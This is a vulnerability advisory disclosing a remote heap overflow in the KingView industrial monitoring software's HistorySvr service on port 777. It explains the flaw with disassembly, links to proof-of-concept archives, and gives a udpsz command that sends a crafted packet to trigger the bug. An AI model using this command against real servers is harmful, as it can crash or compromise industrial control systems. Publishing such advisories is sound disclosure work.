#######################################################################

                             Luigi Auriemma

Application:  KingView
              http://www.wellintek.com
              http://www.wellintech.com/product-kingview.html
Versions:     nettransdll.dll <= 65.50.2010.18017
Platforms:    Windows
Bug:          heap overflow
Exploitation: remote, versus server
Date:         probably found 10 Feb 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


"KingView is a powerful industrial software for monitoring &
controlling industrial processes."


#######################################################################

======
2) Bug
======


HistorySvr.exe is a service listening on port 777.

For handling the opcode 3 the server allocates the memory for the
destination buffer using the number of elements (16bit) passed by the
client and then performs the copying of the data considering the size
of the packet as delimiter:

  00323E52  |.  66:8B7B 07    MOV DI,WORD PTR DS:[EBX+7]        ; get the 16bit number of elements
  ...skip...
  00323E6A  |>  8BC7          MOV EAX,EDI
  00323E6C  |.  25 FFFF0000   AND EAX,0FFFF
  00323E71  |.  8946 18       MOV DWORD PTR DS:[ESI+18],EAX
  00323E74  |.  7E 2D         JLE SHORT 00323EA3
  00323E76  |.  8D0C40        LEA ECX,DWORD PTR DS:[EAX+EAX*2]
  00323E79  |.  C1E1 02       SHL ECX,2
  00323E7C  |.  51            PUSH ECX
  00323E7D  |.  E8 89B80000   CALL 0032F70B                     ; allocate
  ...skip...
  00323EB5  |>  8B4E 54       /MOV ECX,DWORD PTR DS:[ESI+54]
  00323EB8  |.  8B6E 1C       |MOV EBP,DWORD PTR DS:[ESI+1C]
  00323EBB  |.  8D7C03 F4     |LEA EDI,DWORD PTR DS:[EBX+EAX-C]
  00323EBF  |.  83C0 0C       |ADD EAX,0C
  00323EC2  |.  8D0C49        |LEA ECX,DWORD PTR DS:[ECX+ECX*2]
  00323EC5  |.  8D4C8D 00     |LEA ECX,DWORD PTR SS:[EBP+ECX*4]
  00323EC9  |.  8B2F          |MOV EBP,DWORD PTR DS:[EDI]
  00323ECB  |.  8929          |MOV DWORD PTR DS:[ECX],EBP       ; copy loop
  00323ECD  |.  8B6F 04       |MOV EBP,DWORD PTR DS:[EDI+4]
  00323ED0  |.  8969 04       |MOV DWORD PTR DS:[ECX+4],EBP
  00323ED3  |.  8B7F 08       |MOV EDI,DWORD PTR DS:[EDI+8]
  00323ED6  |.  8979 08       |MOV DWORD PTR DS:[ECX+8],EDI
  00323ED9  |.  8B6E 54       |MOV EBP,DWORD PTR DS:[ESI+54]
  00323EDC  |.  45            |INC EBP
  00323EDD  |.  3BC2          |CMP EAX,EDX
  00323EDF  |.  896E 54       |MOV DWORD PTR DS:[ESI+54],EBP
  00323EE2  |.^ 7E D1         \JLE SHORT 00323EB5               ; EDX is the size of the packet


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/kingview_crc.zip

  udpsz -C "0010 03 0000 ffffffff 0100" -D -b a -L kingview_crc -T SERVER 777 0x1004


#######################################################################

======
4) Fix
======


http://www.zerodayinitiative.com/advisories/ZDI-11-351/


#######################################################################